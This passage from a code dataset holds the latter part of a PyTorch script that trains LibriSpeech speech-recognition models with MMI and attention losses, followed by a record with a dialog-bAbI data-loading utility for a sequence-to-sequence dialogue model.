enumerate(dataloader):\n forward_count += 1\n if forward_count == accum_grad:\n is_update = True\n forward_count = 0\n else:\n is_update = False\n\n global_batch_idx_train += 1\n timestamp = datetime.now()\n time_waiting_for_batch += (timestamp - prev_timestamp).total_seconds()\n\n if forward_count == 1 or accum_grad == 1:\n P.set_scores_stochastic_(model.module.P_scores)\n assert P.requires_grad is True\n\n curr_batch_objf, curr_batch_frames, curr_batch_all_frames = get_objf(\n batch=batch,\n model=model,\n ali_model=ali_model,\n P=P,\n device=device,\n graph_compiler=graph_compiler,\n use_pruned_intersect=use_pruned_intersect,\n is_training=True,\n is_update=is_update,\n accum_grad=accum_grad,\n den_scale=den_scale,\n att_rate=att_rate,\n tb_writer=tb_writer,\n global_batch_idx_train=global_batch_idx_train,\n optimizer=optimizer,\n scaler=scaler\n )\n\n total_objf += curr_batch_objf\n total_frames += curr_batch_frames\n total_all_frames += curr_batch_all_frames\n\n if batch_idx % 10 == 0:\n logging.info(\n 'batch {}, epoch {}/{} '\n 'global average objf: {:.6f} over {} 
'\n 'frames ({:.1f}% kept), current batch average objf: {:.6f} over {} frames ({:.1f}% kept) '\n 'avg time waiting for batch {:.3f}s'.format(\n batch_idx, current_epoch, num_epochs,\n total_objf / total_frames, total_frames,\n 100.0 * total_frames / total_all_frames,\n curr_batch_objf / (curr_batch_frames + 0.001),\n curr_batch_frames,\n 100.0 * curr_batch_frames / curr_batch_all_frames,\n time_waiting_for_batch / max(1, batch_idx)))\n\n if tb_writer is not None:\n tb_writer.add_scalar('train/global_average_objf',\n total_objf / total_frames, global_batch_idx_train)\n\n tb_writer.add_scalar('train/current_batch_average_objf',\n curr_batch_objf / (curr_batch_frames + 0.001),\n global_batch_idx_train)\n # if batch_idx >= 10:\n # print(\"Exiting early to get profile info\")\n # sys.exit(0)\n\n if batch_idx > 0 and batch_idx % 200 == 0:\n total_valid_objf, total_valid_frames, total_valid_all_frames = get_validation_objf(\n dataloader=valid_dataloader,\n model=model,\n ali_model=ali_model,\n P=P,\n device=device,\n graph_compiler=graph_compiler,\n use_pruned_intersect=use_pruned_intersect,\n scaler=scaler)\n if world_size > 1:\n s = torch.tensor([\n total_valid_objf, total_valid_frames,\n total_valid_all_frames\n ]).to(device)\n\n dist.all_reduce(s, op=dist.ReduceOp.SUM)\n total_valid_objf, total_valid_frames, total_valid_all_frames = s.cpu().tolist()\n\n valid_average_objf = total_valid_objf / total_valid_frames\n model.train()\n logging.info(\n 'Validation average objf: {:.6f} over {} frames ({:.1f}% kept)'\n .format(valid_average_objf,\n total_valid_frames,\n 100.0 * total_valid_frames / total_valid_all_frames))\n\n if tb_writer is not None:\n tb_writer.add_scalar('train/global_valid_average_objf',\n valid_average_objf,\n global_batch_idx_train)\n model.module.write_tensorboard_diagnostics(tb_writer, global_step=global_batch_idx_train)\n prev_timestamp = datetime.now()\n return total_objf / total_frames, valid_average_objf, global_batch_idx_train\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\n '--world-size',\n type=int,\n default=1,\n help='Number of GPUs for DDP training.')\n parser.add_argument(\n '--master-port',\n type=int,\n default=12354,\n help='Master port to use for DDP training.')\n parser.add_argument(\n '--model-type',\n type=str,\n default=\"conformer\",\n choices=[\"transformer\", \"conformer\", \"contextnet\"],\n help=\"Model type.\")\n parser.add_argument(\n '--num-epochs',\n type=int,\n default=10,\n help=\"Number of training epochs.\")\n parser.add_argument(\n '--start-epoch',\n type=int,\n default=0,\n help=\"Number of start epoch.\")\n parser.add_argument(\n '--warm-step',\n type=int,\n default=5000,\n help='The number of warm-up steps for Noam optimizer.'\n )\n parser.add_argument(\n '--lr-factor',\n type=float,\n default=1.0,\n help='Learning rate factor for Noam optimizer.'\n )\n parser.add_argument(\n '--weight-decay',\n type=float,\n default=0.0,\n help='weight decay (L2 penalty) for Noam optimizer.'\n )\n parser.add_argument(\n '--accum-grad',\n type=int,\n default=1,\n help=\"Number of gradient accumulation.\")\n parser.add_argument(\n '--den-scale',\n type=float,\n default=1.0,\n help=\"denominator scale in mmi loss.\")\n parser.add_argument(\n '--att-rate',\n type=float,\n default=0.0,\n help=\"Attention loss rate.\")\n parser.add_argument(\n '--nhead',\n type=int,\n default=4,\n help=\"Number of attention heads in transformer.\")\n parser.add_argument(\n 
'--attention-dim',\n type=int,\n default=256,\n help=\"Number of units in transformer attention layers.\")\n parser.add_argument(\n '--tensorboard',\n type=str2bool,\n default=True,\n help='Should various information be logged in tensorboard.'\n )\n parser.add_argument(\n '--amp',\n type=str2bool,\n default=True,\n help='Should we use automatic mixed precision (AMP) training.'\n )\n parser.add_argument(\n '--use-ali-model',\n type=str2bool,\n default=True,\n help='If true, we assume that you have run ./ctc_train.py '\n 'and you have some checkpoints inside the directory '\n 'exp-lstm-adam-ctc-musan/ .'\n 'It will use exp-lstm-adam-ctc-musan/epoch-{ali-model-epoch}.pt '\n 'as the pre-trained alignment model'\n )\n parser.add_argument(\n '--ali-model-epoch',\n type=int,\n default=7,\n help='If --use-ali-model is True, load '\n 'exp-lstm-adam-ctc-musan/epoch-{ali-model-epoch}.pt as the alignment model.'\n 'Used only if --use-ali-model is True.'\n )\n parser.add_argument(\n '--use-pruned-intersect',\n type=str2bool,\n default=False,\n help='True to use pruned intersect to compute the denominator lattice. ' \\\n 'You probably want to set it to True if you have a very large LM. ' \\\n 'In that case, you will get an OOM if it is False. ')\n # See https://github.com/k2-fsa/k2/issues/739 for more details\n parser.add_argument(\n '--torchscript',\n type=str2bool,\n default=False,\n help='Should we convert the model to TorchScript before starting training.'\n )\n parser.add_argument(\n '--torchscript-epoch',\n type=int,\n default=-1,\n help='After which epoch should we start storing models with TorchScript,'\n 'so that they can be simply loaded with torch.jit.load(). '\n '-1 disables this option.'\n )\n return parser\n\n\ndef run(rank, world_size, args):\n '''\n Args:\n rank:\n It is a value between 0 and `world_size-1`, which is\n passed automatically by `mp.spawn()` in :func:`main`.\n The node with rank 0 is responsible for saving checkpoint.\n world_size:\n Number of GPUs for DDP training.\n args:\n The return value of get_parser().parse_args()\n '''\n model_type = args.model_type\n start_epoch = args.start_epoch\n num_epochs = args.num_epochs\n accum_grad = args.accum_grad\n den_scale = args.den_scale\n att_rate = args.att_rate\n use_pruned_intersect = args.use_pruned_intersect\n\n fix_random_seed(42)\n setup_dist(rank, world_size, args.master_port)\n\n exp_dir = Path('exp-' + model_type + '-mmi-att-sa-vgg-normlayer')\n setup_logger(f'{exp_dir}/log/log-train-{rank}')\n if args.tensorboard and rank == 0:\n tb_writer = SummaryWriter(log_dir=f'{exp_dir}/tensorboard')\n else:\n tb_writer = None\n # tb_writer = SummaryWriter(log_dir=f'{exp_dir}/tensorboard') if args.tensorboard and rank == 0 else None\n\n logging.info(\"Loading lexicon and symbol tables\")\n lang_dir = Path('data/lang_nosp')\n lexicon = Lexicon(lang_dir)\n\n device_id = rank\n device = torch.device('cuda', device_id)\n\n graph_compiler = MmiTrainingGraphCompiler(\n lexicon=lexicon,\n device=device,\n )\n phone_ids = lexicon.phone_symbols()\n P = create_bigram_phone_lm(phone_ids)\n P.scores = torch.zeros_like(P.scores)\n P = P.to(device)\n\n librispeech = LibriSpeechAsrDataModule(args)\n train_dl = librispeech.train_dataloaders()\n valid_dl = librispeech.valid_dataloaders()\n\n if not torch.cuda.is_available():\n logging.error('No GPU detected!')\n sys.exit(-1)\n\n if use_pruned_intersect:\n logging.info('Use pruned intersect for den_lats')\n else:\n logging.info(\"Don't use pruned intersect for den_lats\")\n\n logging.info(\"About to 
create model\")\n\n if att_rate != 0.0:\n num_decoder_layers = 6\n else:\n num_decoder_layers = 0\n\n if model_type == \"transformer\":\n model = Transformer(\n num_features=80,\n nhead=args.nhead,\n d_model=args.attention_dim,\n num_classes=len(phone_ids) + 1, # +1 for the blank symbol\n subsampling_factor=4,\n num_decoder_layers=num_decoder_layers,\n vgg_frontend=True)\n elif model_type == \"conformer\":\n model = Conformer(\n num_features=80,\n nhead=args.nhead,\n d_model=args.attention_dim,\n num_classes=len(phone_ids) + 1, # +1 for the blank symbol\n subsampling_factor=4,\n num_decoder_layers=num_decoder_layers,\n vgg_frontend=True,\n is_espnet_structure=True)\n elif model_type == \"contextnet\":\n model = ContextNet(\n num_features=80,\n num_classes=len(phone_ids) + 1) # +1 for the blank symbol\n else:\n raise NotImplementedError(\"Model of type \" + str(model_type) + \" is not implemented\")\n\n model.P_scores = nn.Parameter(P.scores.clone(), requires_grad=True)\n\n if args.torchscript:\n logging.info('Applying TorchScript to model...')\n model = torch.jit.script(model)\n\n model.to(device)\n describe(model)\n\n model = DDP(model, device_ids=[rank])\n\n # Now for the alignment model, if any\n if args.use_ali_model:\n ali_model = TdnnLstm1b(\n num_features=80,\n num_classes=len(phone_ids) + 1, # +1 for the blank symbol\n subsampling_factor=4)\n\n ali_model_fname = Path(f'exp-lstm-adam-ctc-musan/epoch-{args.ali_model_epoch}.pt')\n assert ali_model_fname.is_file(), \\\n f'ali model filename {ali_model_fname} does not exist!'\n ali_model.load_state_dict(torch.load(ali_model_fname, map_location='cpu')['state_dict'])\n ali_model.to(device)\n\n ali_model.eval()\n ali_model.requires_grad_(False)\n logging.info(f'Use ali_model: {ali_model_fname}')\n else:\n ali_model = None\n logging.info('No ali_model')\n\n optimizer = Noam(model.parameters(),\n model_size=args.attention_dim,\n factor=args.lr_factor,\n warm_step=args.warm_step,\n weight_decay=args.weight_decay)\n\n scaler = GradScaler(enabled=args.amp)\n\n best_objf = np.inf\n best_valid_objf = np.inf\n best_epoch = start_epoch\n best_model_path = os.path.join(exp_dir, 'best_model.pt')\n best_epoch_info_filename = os.path.join(exp_dir, 'best-epoch-info')\n global_batch_idx_train = 0 # for logging only\n\n if start_epoch > 0:\n model_path = os.path.join(exp_dir, 'epoch-{}.pt'.format(start_epoch - 1))\n ckpt = load_checkpoint(filename=model_path, model=model, optimizer=optimizer, scaler=scaler)\n best_objf = ckpt['objf']\n best_valid_objf = ckpt['valid_objf']\n global_batch_idx_train = ckpt['global_batch_idx_train']\n logging.info(f\"epoch = {ckpt['epoch']}, objf = {best_objf}, valid_objf = {best_valid_objf}\")\n\n for epoch in range(start_epoch, num_epochs):\n train_dl.sampler.set_epoch(epoch)\n curr_learning_rate = optimizer._rate\n if tb_writer is not None:\n tb_writer.add_scalar('train/learning_rate', curr_learning_rate, global_batch_idx_train)\n tb_writer.add_scalar('train/epoch', epoch, global_batch_idx_train)\n\n logging.info('epoch {}, learning rate {}'.format(epoch, curr_learning_rate))\n objf, valid_objf, global_batch_idx_train = train_one_epoch(\n dataloader=train_dl,\n valid_dataloader=valid_dl,\n model=model,\n ali_model=ali_model,\n P=P,\n device=device,\n graph_compiler=graph_compiler,\n use_pruned_intersect=use_pruned_intersect,\n optimizer=optimizer,\n accum_grad=accum_grad,\n den_scale=den_scale,\n att_rate=att_rate,\n current_epoch=epoch,\n tb_writer=tb_writer,\n num_epochs=num_epochs,\n 
global_batch_idx_train=global_batch_idx_train,\n world_size=world_size,\n scaler=scaler\n )\n # the lower, the better\n if valid_objf < best_valid_objf:\n best_valid_objf = valid_objf\n best_objf = objf\n best_epoch = epoch\n save_checkpoint(filename=best_model_path,\n optimizer=None,\n scheduler=None,\n scaler=None,\n model=model,\n epoch=epoch,\n learning_rate=curr_learning_rate,\n objf=objf,\n valid_objf=valid_objf,\n global_batch_idx_train=global_batch_idx_train,\n local_rank=rank,\n torchscript=args.torchscript_epoch != -1 and epoch >= args.torchscript_epoch\n )\n save_training_info(filename=best_epoch_info_filename,\n model_path=best_model_path,\n current_epoch=epoch,\n learning_rate=curr_learning_rate,\n objf=objf,\n best_objf=best_objf,\n valid_objf=valid_objf,\n best_valid_objf=best_valid_objf,\n best_epoch=best_epoch,\n local_rank=rank)\n\n # we always save the model for every epoch\n model_path = os.path.join(exp_dir, 'epoch-{}.pt'.format(epoch))\n save_checkpoint(filename=model_path,\n optimizer=optimizer,\n scheduler=None,\n scaler=scaler,\n model=model,\n epoch=epoch,\n learning_rate=curr_learning_rate,\n objf=objf,\n valid_objf=valid_objf,\n global_batch_idx_train=global_batch_idx_train,\n local_rank=rank,\n torchscript=args.torchscript_epoch != -1 and epoch >= args.torchscript_epoch\n )\n epoch_info_filename = os.path.join(exp_dir, 'epoch-{}-info'.format(epoch))\n save_training_info(filename=epoch_info_filename,\n model_path=model_path,\n current_epoch=epoch,\n learning_rate=curr_learning_rate,\n objf=objf,\n best_objf=best_objf,\n valid_objf=valid_objf,\n best_valid_objf=best_valid_objf,\n best_epoch=best_epoch,\n local_rank=rank)\n\n logging.warning('Done')\n torch.distributed.barrier()\n cleanup_dist()\n\n\ndef main():\n parser = get_parser()\n LibriSpeechAsrDataModule.add_arguments(parser)\n args = parser.parse_args()\n world_size = args.world_size\n assert world_size >= 1\n mp.spawn(run, args=(world_size, args), nprocs=world_size, join=True)\n\n\ntorch.set_num_threads(1)\ntorch.set_num_interop_threads(1)\n\nif __name__ == '__main__':\n main()\n","sub_path":"egs/librispeech/asr/simple_v1/mmi_att_transformer_train.py","file_name":"mmi_att_transformer_train.py","file_ext":"py","file_size_in_byte":27443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
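Stripped of the MMI specifics, the training loop above interleaves two standard PyTorch patterns: gradient accumulation (scale the loss by 1/accum_grad and step only every accum_grad batches) and mixed-precision loss scaling via GradScaler. A minimal sketch with a placeholder loss; model, loader, and optimizer are assumed:

import torch
from torch.cuda.amp import GradScaler, autocast

def train_epoch(model, loader, optimizer, accum_grad=4):
    scaler = GradScaler()
    optimizer.zero_grad()
    for i, (x, y) in enumerate(loader):
        with autocast():
            loss = torch.nn.functional.mse_loss(model(x), y) / accum_grad
        scaler.scale(loss).backward()   # gradients accumulate across micro-batches
        if (i + 1) % accum_grad == 0:   # update weights every accum_grad batches
            scaler.step(optimizer)      # unscales first; skips the step on inf/nan
            scaler.update()
            optimizer.zero_grad()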
+{"seq_id":"116037806","text":"import json\nimport torch\nimport torch.utils.data as data\nimport unicodedata\nimport string\nimport re\nimport random\nimport time\nimport math\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch import optim\nimport torch.nn.functional as F\nfrom utils.config import *\nimport logging \nimport datetime\n\nclass Lang:\n def __init__(self):\n self.word2index = {}\n self.word2count = {}\n self.index2word = {UNK_token: 'UNK', PAD_token: \"PAD\", EOS_token: \"EOS\", SOS_token: \"SOS\"}\n self.n_words = 4 # Count default tokens\n \n def index_words(self, sentence):\n for word in sentence.split(' '):\n self.index_word(word)\n\n def index_word(self, word):\n if word not in self.word2index:\n self.word2index[word] = self.n_words\n self.word2count[word] = 1\n self.index2word[self.n_words] = word\n self.n_words += 1\n else:\n self.word2count[word] += 1\n\n\nclass Dataset(data.Dataset):\n \"\"\"Custom data.Dataset compatible with data.DataLoader.\"\"\"\n def __init__(self, src_seq, trg_seq, index_seq, gate_seq,src_word2id, trg_word2id,max_len):\n \"\"\"Reads source and target sequences from txt files.\"\"\"\n self.src_seqs = src_seq\n self.trg_seqs = trg_seq\n self.index_seqs = index_seq \n self.gate_seq = gate_seq \n self.num_total_seqs = len(self.src_seqs)\n self.src_word2id = src_word2id\n self.trg_word2id = trg_word2id\n self.max_len = max_len\n\n def __getitem__(self, index):\n \"\"\"Returns one data pair (source and target).\"\"\"\n src_seq = self.src_seqs[index]\n trg_seq = self.trg_seqs[index]\n index_s = self.index_seqs[index]\n gete_s = self.gate_seq[index]\n src_seq = self.preprocess(src_seq, self.src_word2id, trg=False)\n trg_seq = self.preprocess(trg_seq, self.trg_word2id)\n index_s = self.preprocess_inde(index_s,src_seq)\n gete_s = self.preprocess_gate(gete_s)\n \n return src_seq, trg_seq, index_s, gete_s,self.max_len,self.src_seqs[index],self.trg_seqs[index]\n\n def __len__(self):\n return self.num_total_seqs\n \n def preprocess(self, sequence, word2id, trg=True):\n \"\"\"Converts words to ids.\"\"\"\n if(trg):\n sequence = [word2id[word] if word in word2id else UNK_token for word in sequence.split(' ')]+ [EOS_token]\n sequence = torch.Tensor(sequence)\n else:\n sequence = [word2id[word] if word in word2id else UNK_token for word in sequence.split(' ')]\n sequence = torch.Tensor(sequence)\n return sequence\n\n def preprocess_inde(self, sequence,src_seq):\n \"\"\"Converts words to ids.\"\"\"\n sequence = sequence + [len(src_seq)-1]\n sequence = torch.Tensor(sequence)\n return sequence\n\n def preprocess_gate(self, sequence):\n \"\"\"Converts words to ids.\"\"\"\n sequence = sequence + [0]\n sequence = torch.Tensor(sequence)\n return sequence\n\ndef collate_fn(data):\n def merge(sequences,max_len):\n lengths = [len(seq) for seq in sequences]\n if (max_len):\n padded_seqs = torch.ones(len(sequences), max_len[0]).long()\n else:\n padded_seqs = torch.ones(len(sequences), max(lengths)).long()\n for i, seq in enumerate(sequences):\n end = lengths[i]\n padded_seqs[i, :end] = seq[:end]\n return padded_seqs, lengths\n\n # sort a list by sequence length (descending order) to use pack_padded_sequence\n data.sort(key=lambda x: len(x[0]), reverse=True)\n # seperate source and target sequences\n src_seqs, trg_seqs, ind_seqs, gete_s, max_len, src_plain,trg_plain = zip(*data)\n # merge sequences (from tuple of 1D tensor to 2D tensor)\n src_seqs, src_lengths = merge(src_seqs,max_len)\n trg_seqs, trg_lengths = merge(trg_seqs,None)\n 
ind_seqs, _ = merge(ind_seqs,None)\n gete_s, _ = merge(gete_s,None)\n \n src_seqs = Variable(src_seqs).transpose(0,1)\n trg_seqs = Variable(trg_seqs).transpose(0,1)\n ind_seqs = Variable(ind_seqs).transpose(0,1)\n gete_s = Variable(gete_s).transpose(0,1)\n if USE_CUDA:\n src_seqs = src_seqs.cuda()\n trg_seqs = trg_seqs.cuda()\n ind_seqs = ind_seqs.cuda()\n gete_s = gete_s.cuda()\n return src_seqs, src_lengths, trg_seqs, trg_lengths, ind_seqs, gete_s, src_plain, trg_plain\n\n\ndef read_langs(file_name, max_line = None):\n logging.info((\"Reading lines from {}\".format(file_name)))\n # Read the file and split into lines\n data=[]\n context=\"\"\n u=None\n r=None\n with open(file_name) as fin:\n cnt_ptr = 0\n cnt_voc = 0\n max_r_len = 0\n cnt_lin = 1\n for line in fin:\n line=line.strip()\n if line:\n nid, line = line.split(' ', 1)\n if '\\t' in line:\n u, r = line.split('\\t')\n context += str(u)+\" \" \n contex_arr = context.split(' ')[LIMIT:]\n r_index = []\n gate = []\n for key in r.split(' '):\n index = [loc for loc, val in enumerate(contex_arr) if val == key]\n if (index):\n index = max(index)\n gate.append(1)\n cnt_ptr +=1\n else: \n index = len(contex_arr) - 1 \n gate.append(0) \n cnt_voc +=1 \n r_index.append(index)\n\n if len(r_index) > max_r_len: \n max_r_len = len(r_index)\n data.append([\" \".join(contex_arr)+\"$$$$\",r,r_index,gate])\n context+=str(r)+\" \" \n else:\n r=line\n if USEKB:\n context+=str(r)+\" \" \n else:\n cnt_lin+=1\n if(max_line and cnt_lin>=max_line):\n break\n context=\"\"\n max_len = max([len(d[0].split(' ')) for d in data])\n avg_len = sum([len(d[0].split(' ')) for d in data]) / float(len([len(d[0].split(' ')) for d in data]))\n logging.info(\"Pointer percentace= {} \".format(cnt_ptr/(cnt_ptr+cnt_voc)))\n logging.info(\"Max responce Len: {}\".format(max_r_len))\n logging.info(\"Max Input Len: {}\".format(max_len))\n logging.info(\"AVG Input Len: {}\".format(avg_len))\n return data, max_len, max_r_len\n\n\ndef get_seq(pairs,lang,batch_size,type,max_len): \n x_seq = []\n y_seq = []\n ptr_seq = []\n gate_seq = []\n for pair in pairs:\n x_seq.append(pair[0])\n y_seq.append(pair[1])\n ptr_seq.append(pair[2])\n gate_seq.append(pair[3])\n if(type):\n lang.index_words(pair[0])\n lang.index_words(pair[1])\n \n dataset = Dataset(x_seq, y_seq,ptr_seq,gate_seq,lang.word2index, lang.word2index,max_len)\n data_loader = torch.utils.data.DataLoader(dataset=dataset,\n batch_size=batch_size,\n shuffle=type,\n collate_fn=collate_fn)\n return data_loader\n\ndef prepare_data_seq(task,batch_size=100,shuffle=True):\n file_train = 'data/dialog-bAbI-tasks/dialog-babi-task{}trn.txt'.format(task)\n file_dev = 'data/dialog-bAbI-tasks/dialog-babi-task{}dev.txt'.format(task)\n file_test = 'data/dialog-bAbI-tasks/dialog-babi-task{}tst.txt'.format(task)\n if (int(task) != 6):\n file_test_OOV = 'data/dialog-bAbI-tasks/dialog-babi-task{}tst-OOV.txt'.format(task)\n pair_train,max_len_train, max_r_train = read_langs(file_train, max_line=None)\n pair_dev,max_len_dev, max_r_dev = read_langs(file_dev, max_line=None)\n pair_test,max_len_test, max_r_test = read_langs(file_test, max_line=None)\n max_r_test_OOV = 0\n max_len_test_OOV = 0\n if (int(task) != 6):\n pair_test_OOV,max_len_test_OOV, max_r_test_OOV = read_langs(file_test_OOV, max_line=None)\n \n max_len = max(max_len_train,max_len_dev,max_len_test,max_len_test_OOV) +1\n max_r = max(max_r_train,max_r_dev,max_r_test,max_r_test_OOV) +1\n lang = Lang()\n \n train = get_seq(pair_train,lang,batch_size,True,max_len)\n dev = 
get_seq(pair_dev,lang,batch_size,False,max_len)\n test = get_seq(pair_test,lang,batch_size,False,max_len)\n if (int(task) != 6):\n testOOV = get_seq(pair_test_OOV,lang,batch_size,False,max_len)\n else:\n testOOV = []\n \n \n logging.info(\"Read %s sentence pairs train\" % len(pair_train))\n logging.info(\"Read %s sentence pairs dev\" % len(pair_dev))\n logging.info(\"Read %s sentence pairs test\" % len(pair_test))\n if (int(task) != 6):\n logging.info(\"Read %s sentence pairs test\" % len(pair_test_OOV)) \n logging.info(\"Max len Input %s \" % max_len)\n logging.info(\"Vocab_size %s \" % lang.n_words)\n logging.info(\"USE_CUDA={}\".format(USE_CUDA))\n \n return train, dev, test, testOOV, lang, max_len, max_r\n\n","sub_path":"utils/utils_babi.py","file_name":"utils_babi.py","file_ext":"py","file_size_in_byte":9160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
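Condensed, the padding scheme collate_fn implements is: sort the batch by source length (so pack_padded_sequence can be used downstream) and right-pad with the PAD index. A standalone sketch; PAD_token = 1 is an assumption matching the torch.ones() padding above:

import torch

PAD_token = 1  # assumed; collate_fn pads with torch.ones()

def pad_batch(seqs):
    seqs = sorted(seqs, key=len, reverse=True)
    lengths = [len(s) for s in seqs]
    out = torch.full((len(seqs), max(lengths)), PAD_token, dtype=torch.long)
    for i, s in enumerate(seqs):
        out[i, :len(s)] = torch.tensor(s)
    return out, lengths

padded, lengths = pad_batch([[5, 6, 7], [8], [2, 3]])
assert lengths == [3, 2, 1] and padded.shape == (3, 3)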